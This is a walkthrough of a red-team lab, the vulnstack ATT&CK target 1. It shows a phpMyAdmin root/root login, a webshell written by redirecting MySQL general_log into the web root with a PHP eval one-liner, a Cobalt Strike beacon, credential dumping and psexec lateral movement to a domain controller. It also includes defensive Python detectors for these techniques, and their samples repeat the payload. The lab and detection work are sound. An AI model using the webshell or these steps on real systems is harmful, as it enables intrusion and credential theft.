True unfreedom is building a cage inside one's own heart.

ATT&CK Red Team Assessment Practical Target - 1

Introduction#

The target environment comes from: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

A simple target environment originally prepared for a student assessment, although it ended up not being used. Lateral movement in the domain relies only on the psexec module of Cobalt Strike; the main purpose is to become familiar with the general penetration workflow.

Many of the vulnerabilities in the lab could not be reproduced successfully, and the environment has a few issues, but the overall process works.

Environment Setup#

Accelerated 3D graphics must be disabled in the VM settings; otherwise the virtual machine will not start.

image

The topology diagram is as follows:

image

The network settings are as follows, using VMnet2 and VMnet8:

image

Web server (VM1) - Windows 7 (dual NIC: NAT mode + VMnet2 (host-only))

image

IP: 192.168.111.128 and 192.168.52.143

Start phpStudy

image

DNS points to the DC

image

Windows 2008 DC (VM3)

IP: 192.168.52.138

image

Windows 2003 domain member (VM2)

IP: 192.168.52.141

image

View the current domain

image

Penetration Process#

Information Gathering#

Nmap Port Scanning#

image

image

Sword Scanning#

image

Directory Scanning#

image

phpinfo page

image

phpMyAdmin Login#

The password is root/root

image

phpMyAdmin Getshell#

Getting a shell through the MySQL log file

Check whether logging is enabled and where the log file is stored: SHOW VARIABLES LIKE "general_log%";

image

Enable logging: set global general_log='on';
Check that it is enabled: SHOW VARIABLES LIKE "general_log%";

image

Point the log file at a path of our choosing inside the web root; the website's root directory has to be located first.

image

Set the log path: set global general_log_file ='C:\\phpStudy\\WWW\\s.php';

Set successfully

image

With the preparation done, write the shell. A single SQL query is enough, because every statement executed is written verbatim into the log file.

select "<?php @eval($_POST[cmd]);?>";

image

Access webshell:
http://192.168.111.128/ss.php

image
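The steps above work because general_log writes every statement to whatever file general_log_file names, and the MySQL service account can write into the web root. As an added defender-side example (not code from the original post), the script below implements two checks: one scans a query/audit log for the three tell-tale statements (enabling general_log, redirecting general_log_file into a web-served directory or to a script extension, and a SELECT whose string literal contains a PHP open tag), and the other evaluates the output of SHOW VARIABLES. The log lines are constructed for this example; the web root C:\phpStudy\WWW is taken from the post, and the log line format and the list of script extensions are assumptions.

```python
"""Detect MySQL general_log abuse: the log redirected into the web root as a script file.
Added example, not part of the original post. Assumptions are marked in comments."""
import re
from pathlib import PureWindowsPath

# Directories the web server serves. The phpStudy path comes from the post;
# on a real host, take this from the web server configuration.
WEB_ROOTS = [r"C:\phpStudy\WWW"]
# Extensions the web server would execute (assumed list).
SCRIPT_EXTS = {".php", ".phtml", ".asp", ".aspx", ".jsp"}

# Constructed sample log, assumed format: "<timestamp>\t<conn id> Query\t<statement>".
SAMPLE_LOG = (
    '2024-01-01T10:00:01Z\t8 Query\tSHOW VARIABLES LIKE "general_log%"\n'
    "2024-01-01T10:00:05Z\t8 Query\tset global general_log='on'\n"
    "2024-01-01T10:00:09Z\t8 Query\tset global general_log_file ='C:\\\\phpStudy\\\\WWW\\\\s.php'\n"
    '2024-01-01T10:00:12Z\t8 Query\tselect "<?php @eval($_POST[cmd]);?>"\n'
    "2024-01-01T10:00:15Z\t9 Query\tSELECT id, title FROM posts LIMIT 10\n"
    "2024-01-01T10:00:20Z\t9 Query\tset global general_log_file ='C:\\\\mysql\\\\data\\\\query.log'\n"
)

LINE_RE = re.compile(r"^(?P<ts>\S+)\t(?P<conn>\d+) Query\t(?P<sql>.*)$")
SET_LOG_RE = re.compile(r"set\s+global\s+general_log\s*=\s*['\"]?(on|1)['\"]?", re.I)
SET_FILE_RE = re.compile(r"set\s+global\s+general_log_file\s*=\s*['\"](?P<path>[^'\"]+)['\"]", re.I)
PHP_TAG_RE = re.compile(r"<\?(php|=)", re.I)


def path_is_web_served(path, web_roots=WEB_ROOTS):
    """True if the path is under a served directory or has a server-side script extension."""
    p = PureWindowsPath(path)
    p_str = str(p).lower()
    root_hit = any(
        p_str.startswith(str(PureWindowsPath(r)).lower().rstrip("\\") + "\\")
        for r in web_roots
    )
    # A script file outside the known roots is still worth a look (unknown vhost).
    return root_hit or p.suffix.lower() in SCRIPT_EXTS


def audit_statements(log_text, web_roots=WEB_ROOTS):
    """Return (line number, rule name, statement) for each suspicious statement."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue
        sql = m.group("sql").strip()
        if SET_LOG_RE.search(sql):
            findings.append((n, "general_log_enabled", sql))
        fm = SET_FILE_RE.search(sql)
        if fm:
            # MySQL string literals escape backslashes, so '\\' in SQL is one '\' on disk.
            path = fm.group("path").replace("\\\\", "\\")
            if path_is_web_served(path, web_roots):
                findings.append((n, "general_log_file_in_webroot", sql))
        if re.match(r"select\s", sql, re.I) and PHP_TAG_RE.search(sql):
            findings.append((n, "script_tag_in_select_literal", sql))
    return findings


def check_server_config(variables, web_roots=WEB_ROOTS):
    """variables: dict of SHOW VARIABLES output (name -> value). Returns a list of issues."""
    issues = []
    if variables.get("general_log", "OFF").upper() in ("ON", "1"):
        issues.append("general_log is ON: every statement, attacker-supplied strings included, is written to disk")
    log_file = variables.get("general_log_file", "")
    if log_file and path_is_web_served(log_file, web_roots):
        issues.append(f"general_log_file points into a web-served location: {log_file}")
    # secure_file_priv does not govern general_log_file, but an empty value also
    # leaves SELECT ... INTO OUTFILE free to write anywhere the service account can.
    if variables.get("secure_file_priv", "") == "":
        issues.append("secure_file_priv is empty: SELECT ... INTO OUTFILE is unrestricted")
    return issues


if __name__ == "__main__":
    for n, rule, sql in audit_statements(SAMPLE_LOG):
        print(f"line {n}: {rule}: {sql}")
    print(check_server_config({"general_log": "ON",
                               "general_log_file": r"C:\phpStudy\WWW\s.php",
                               "secure_file_priv": ""}))
```

The configuration check is the one that matters in the lab: the MySQL root account should not be reachable through phpMyAdmin with root/root, the service account should have no write access to the web root, and general_log should normally stay off. The statement audit is the detection you would run in a SIEM once audit logging or query logging is shipped off the host.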

Ant Sword connection:

image

The site on port 80 is yxcms

image

After logging in to the admin backend, SQL statements can be executed there as well.

image

Check the IP addresses from the webshell

image

Two NICs found

Cobalt Strike Startup#

Bring the host online in Cobalt Strike.

Server

image

Client

Create a listener

image

image

Generate payload

image

Upload the payload through Ant Sword and execute it

image

Run the exe; the beacon checks in to Cobalt Strike.

image

sleep 0

image

shell whoami

image

Privilege Escalation#

Use getsystem in Cobalt Strike to escalate to SYSTEM privileges in one step.

image

Internal Network Information Gathering#

image

Click Targets to find the three machines; if they do not show up, run a port scan to discover them.

image

Dump hashes

image

Obtain plaintext passwords

image

Lateral Movement#

After obtaining the password, lateral movement is done with psexec. Here the three machines share the same password; if they differed, this SMB-based lateral movement would not work.

image

Select psexec64 (64-bit)

image

image

Take over the domain controller.

image

image

image

Use the same method to take control of the Windows 2003 domain member, 141.

image

psexec (32-bit) must be selected here

image

Check the IP

image
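The psexec move that took the DC and the 2003 member leaves a System-log trace on each target: a new service is installed (Event ID 7045) whose binary was dropped over SMB. As an added defender-side example (not code from the original post), the script below triages constructed 7045 records and flags the patterns a responder would look for: the Sysinternals PSEXESVC service, a service binary referenced through an admin share such as \\127.0.0.1\ADMIN$, a short random-looking service name, and a binary outside the standard Windows directories. The event records and host names are constructed; the seven-character random-name heuristic and the trusted-directory list are assumptions, not authoritative indicators.

```python
"""Triage Windows 'service installed' events (ID 7045) for remote service-execution patterns.
Added example, not part of the original post. Heuristics are marked as assumptions."""
import re

# Constructed sample events, one per machine in the lab plus a benign one.
SAMPLE_EVENTS = [
    {"host": "DC", "event_id": 7045, "ServiceName": "WinDefend",
     "ImagePath": r'"C:\Program Files\Windows Defender\MsMpEng.exe"', "AccountName": "LocalSystem"},
    {"host": "DC", "event_id": 7045, "ServiceName": "4f2a9c1",
     "ImagePath": r"\\127.0.0.1\ADMIN$\4f2a9c1.exe", "AccountName": "LocalSystem"},
    {"host": "MEMBER2003", "event_id": 7045, "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe", "AccountName": "LocalSystem"},
    {"host": "WEB", "event_id": 7036, "ServiceName": "Spooler", "ImagePath": ""},
]

# Service binary referenced through an admin share (\\host\ADMIN$\... or \\host\C$\...).
ADMIN_SHARE_RE = re.compile(r"^\\\\[^\\]+\\(ADMIN|C)\$\\", re.I)
# Assumption: a 7-character alphanumeric name mixing letters and digits is "random-looking".
RANDOM_NAME_RE = re.compile(r"^[a-z0-9]{7}$", re.I)
# Assumed set of directories where legitimate service binaries normally live.
TRUSTED_DIRS = ("%systemroot%", "c:\\windows", "c:\\program files")


def classify_service_install(ev):
    """Return the list of reasons an event is suspicious (empty for benign or non-7045)."""
    if ev.get("event_id") != 7045:
        return []
    name = ev.get("ServiceName", "")
    image = ev.get("ImagePath", "").strip('"')
    reasons = []
    if name.upper() == "PSEXESVC" or "psexesvc.exe" in image.lower():
        reasons.append("sysinternals_psexec_service")
    if ADMIN_SHARE_RE.match(image):
        reasons.append("binary_staged_via_admin_share")
    if RANDOM_NAME_RE.match(name) and re.search(r"[0-9]", name) and re.search(r"[a-z]", name, re.I):
        reasons.append("random_looking_service_name")
    if image and not image.lower().startswith(TRUSTED_DIRS):
        reasons.append("image_outside_standard_dirs")
    return reasons


def triage(events):
    """Keep only flagged events, with host, service name and the reasons."""
    hits = []
    for ev in events:
        reasons = classify_service_install(ev)
        if reasons:
            hits.append({"host": ev["host"], "ServiceName": ev["ServiceName"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"{hit['host']}: service {hit['ServiceName']} -> {', '.join(hit['reasons'])}")
```

Correlating these hits across hosts within a short window is what exposes the lateral movement as a whole; the reason it succeeded here, one local administrator password shared by all three machines, is the thing to fix, for example with per-host randomized local administrator passwords (LAPS) so a hash or plaintext from the web server no longer opens the DC.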
